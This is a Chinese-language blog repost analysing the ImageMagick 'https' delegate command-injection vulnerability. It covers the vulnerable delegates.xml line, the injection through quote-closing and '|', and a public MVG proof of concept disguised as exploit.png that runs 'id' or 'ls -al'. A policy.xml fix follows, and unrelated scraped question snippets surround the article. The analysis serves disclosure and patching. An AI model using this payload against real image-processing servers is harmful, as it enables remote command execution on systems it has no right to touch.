- ubuntu12.04环境下使用kvm ioctl接口实现最简单的虚拟机
- Ubuntu 通过无线网络安装Ubuntu Server启动系统后连接无线网络的方法
- 在Ubuntu上搭建网桥的方法
- ubuntu 虚拟机上网方式及相关配置详解
CFSDN坚持开源创造价值,我们致力于搭建一个资源共享平台,让每一个IT人在这里找到属于你的精彩世界.
这篇CFSDN的博客文章深入浅析ImageMagick命令执行漏洞由作者收集整理,如果你对这篇文章有兴趣,记得点赞哟.
00 前言 。
什么是ImageMagick?
ImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理超过90种的图片文件,包括流行的JPEG、GIF、 PNG、PDF以及PhotoCD等格式。使用它可以对图片进行切割、旋转、组合等多种特效的处理.
由于其功能强大、性能较好,并且对很多语言都有拓展支持,所以在程序开发中被广泛使用。许多网站开发者喜爱使用ImageMagick拓展来做web上的图片处理工作,比如用户头像生成、图片编辑等.
01 漏洞描述 。
ImageMagick是一款开源图片处理库,支持PHP、Ruby、NodeJS和Python等多种语言,使用非常广泛。包括PHP imagick、Ruby rmagick和paperclip以及NodeJS imagemagick等多个图片处理插件都依赖它运行。当攻击者构造含有恶意代码得图片时,ImageMagick库对于HTTPPS文件处理不当,没有做任何过滤,可远程实现远程命令执行,进而可能控制服务器.
02 影响程度 。
攻击成本:低 。
危害程度:高 。
影响范围:ImageMagick 6.9.3-9以前的所有版本 。
03 漏洞分析 。
命令执行漏洞是出在ImageMagick对https形式的文件处理的过程中.
ImageMagick之所以支持那么多的文件格式,是因为它内置了非常多的图像处理库,对于这些图像处理库,ImageMagick给它起了个名字叫做”Delegate”(委托),每个Delegate对应一种格式的文件,然后通过系统的system()命令来调用外部的lib进行处理。调用外部lib的过程是使用系统的system命令来执行的,导致命令执行的代码.
ImageMagick委托的默认配置文件: /etc/ImageMagick/delegates.xml 。
具体代码请参考:Github-ImageMagick 。
我们定位到https委托得那一行:
1
|
" <delegate decode=\"https\" command=\""
wget
" -q -O "
%
o
" "
https:
%
M
"\"/>"
|
可以看到,command定义了它对于https文件处理时带入system()函数得命令:"wget" -q -O "%o" "https:%M".
wget是从网络下载文件得命令,%M是一个占位符,它得具体定义在配置文件中如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
%
i
input
image filename
%
o output image filename
%
u unique temporary filename
%
Z unique temporary filename
%
# input image signature
%
b image
file
size
%
c
input
image comment
%
g image geometry
%
h image rows (height)
%
k
input
image number colors
%
l image label
%
m
input
image
format
%
p page number
%
q
input
image depth
%
s scene number
%
w image columns (width)
%
x
input
image x resolution
%
y
input
image y resolution
|
可以看到%m被定义为输入的图片格式,也就是我们输入的url地址。但是由于只是做了简单的字符串拼接,没有做任何过滤,直接拼接到command命令中,所以我们可以将引号闭合后通过"|",”`”,”&”等带入其他命令,也就形成了命令注入.
比如我们传入如下代码:
1
|
https:
/
/
test.com"|ls “
-
al
|
则实际得system函数执行得命令为:
1
|
“wget”
-
q
-
O “
%
o” “ https:
/
/
test.com"|ls “
-
al”
|
这样,ls -al命令成功执行.
04 漏洞利用 。
这个漏洞得poc由老外给出得,如下:
1
2
3
4
|
push graphic
-
context
viewbox
0
0
640
480
fill
'url(https://"|id; ")'
pop graphic
-
context
|
push和pop是用于堆栈的操作,一个进栈,一个出栈,
viewbox是表示SVG可见区域的大小,或者可以想象成舞台大小,画布大小。简单理解就是根据后面得参数选取其中得一部分画面,
fill url()是把图片填充到当前元素内,
在其中我们使用了fill url()的形式调用存在漏洞的https delegate,当ImageMagick去处理这个文件时,漏洞就会被触发.
附:ImageMagick默认支持一种图片格式,叫mvg,而mvg与svg格式类似,其中是以文本形式写入矢量图的内容,允许在其中加载ImageMagick中其他的delegate(比如存在漏洞的https delegate)。并且在图形处理的过程中,ImageMagick会自动根据其内容进行处理,也就是说我们可以将文件随意定义为png、jpg等网站上传允许的格式,这大大增加了漏洞的可利用场景.
利用过程:
创建一个exploit.png文件,包含以下内容:
1
2
3
4
|
push graphic
-
context
viewbox
0
0
640
480
fill
'url(https://test.com/image.jpg"|ls "-al)'
pop graphic
-
context
|
执行命令:convert exploit.png 1.png(后面的是convert的参数) 。
05 漏洞修复 。
升级到最新版本 。
配置/etc/ImageMagick/policy.xml的方式来禁止https、mvg这些delegate,或者直接在配置文件删除相应的delegate 。
1
2
3
4
5
6
7
|
<policymap>
<policy domain
=
"coder"
rights
=
"none"
pattern
=
"EPHEMERAL"
/
>
<policy domain
=
"coder"
rights
=
"none"
pattern
=
"URL"
/
>
<policy domain
=
"coder"
rights
=
"none"
pattern
=
"HTTPS"
/
>
<policy domain
=
"coder"
rights
=
"none"
pattern
=
"MVG"
/
>
<policy domain
=
"coder"
rights
=
"none"
pattern
=
"MSL"
/
>
<
/
policymap>
|
以上所述是小编给大家介绍的ImageMagick命令执行漏洞的知识,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对我网站的支持! 。
原文链接:http://byd.dropsec.xyz/2016/10/02/ImageMagick命令执行漏洞浅析/ 。
最后此篇关于深入浅析ImageMagick命令执行漏洞的文章就讲到这里了,如果你想了解更多关于深入浅析ImageMagick命令执行漏洞的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。
我有一个“有趣”的问题,即以两种不同的方式运行 wine 会导致: $> wine --version /Applications/Wine.app/Contents/Resources/bin/wi
我制作了这个网络抓取工具来获取网页中的表格。我使用 puppeteer (不知道 crontab 有问题)、Python 进行清理并处理数据库的输出 但令我惊讶的是,当我执行它时 */50 * * *
JavaScript 是否被调用或执行取决于什么?准确地说,我有两个函数,它们都以相同的方式调用: [self.mapView stringByEvaluatingJavaScriptFromStri
我目前正在使用 python 做一个机器学习项目(这里是初学者,从头开始学习一切)。 只是想知道 statsmodels 的 OLS 和 scikit 的 PooledOlS 使用我拥有的相同面板数据
在使用集成对象模型 (IOM) 后,我可以执行 SAS 代码并将 SAS 数据集读入 .Net/C# 数据集 here . 只是好奇,使用 .Net 作为 SAS 服务器的客户端与使用 Enterpr
有一些直接的 jQuery 在单击时隐藏打开的 div 未显示,但仍将高度添加到导航中以使其看起来好像要掉下来了。 这个脚本工作正常: $(document).ready(funct
这个问题已经有答案了: How do I compare strings in Java? (23 个回答) 已关闭 4 年前。 这里是 Java 新手,我正在使用 NetBeans 尝试一些简单的代
如果我将它切换到 Python 2.x,它执行 10。这是为什么? 训练逻辑回归模型 import keras.backend as
我有两个脚本,它们包含在 HTML 正文中。在第一个脚本中,我初始化一个 JS 对象,该对象在第二个脚本标记中引用。 ... obj.a = 1000; obj.
每当我运行该方法时,我都会收到一个带有数字的错误 以下是我的代码。 public String getAccount() { String s = "Listing the accounts";
我已经用 do~while(true) 创建了我的菜单;但是每次用户输入一个数字时,它不会运行程序,而是再次显示菜单!你怎么看? //我的主要方法 public static void main(St
执行命令后,如何让IPython通知我?我可以使用铃声/警报还是通过弹出窗口获取它?我正在OS X 10.8.5的iTerm上运行Anaconda。 最佳答案 使用最新版本的iTerm,您可以在she
您好,我刚刚使用菜单栏为 Swing 编写了代码。但是问题出现在运行中。我输入: javac Menu.java java Menu 它没有给出任何错误,但 GUI 没有显示。这是我的源代码以供引用:
我觉得这里缺少明显的东西,但是我看不到它写在任何地方。 我使用Authenticode证书对可执行文件进行签名,但是当我开始学习有关它的更多信息时,我对原样的值(value)提出了质疑。 签名的exe
我正在设计一个应用程序,它使用 DataTables 中的预定义库来创建数据表。我想对数据表执行删除操作,为此应在按钮单击事件上执行 java 脚本。 $(document).ready(functi
我是 Haskell 新手,如果有人愿意帮助我,我会很高兴!我试图让这个程序与 do while 循环一起工作。 第二个 getLine 命令的结果被放入变量 goGlenn 中,如果 goGlenn
我有一个用 swing 实现迷你游戏的程序,在主类中我有一个循环,用于监听游戏 map 中的 boolean 值。使用 while 实现的循环不会执行一条指令,如果它是唯一的一条指令,我不知道为什么。
我正在尝试开发一个连接到 Oracle 数据库并执行函数的 Java 应用程序。如果我在 Eclipse 中运行该应用程序,它可以工作,但是当我尝试在 Windows 命令提示符中运行 .jar 时,
我正在阅读有关 Java 中的 Future 和 javascript 中的 Promises 的内容。下面是我作为示例编写的代码。我的问题是分配给 future 的任务什么时候开始执行? 当如下行创
我有一个常见的情况,您有两个变量(xSpeed 和 ySpeed),当它们低于 minSpeed 时,我想将它们独立设置为零,并在它们都为零时退出。 最有效的方法是什么?目前我有两种方法(方法2更干净
我是一名优秀的程序员,十分优秀!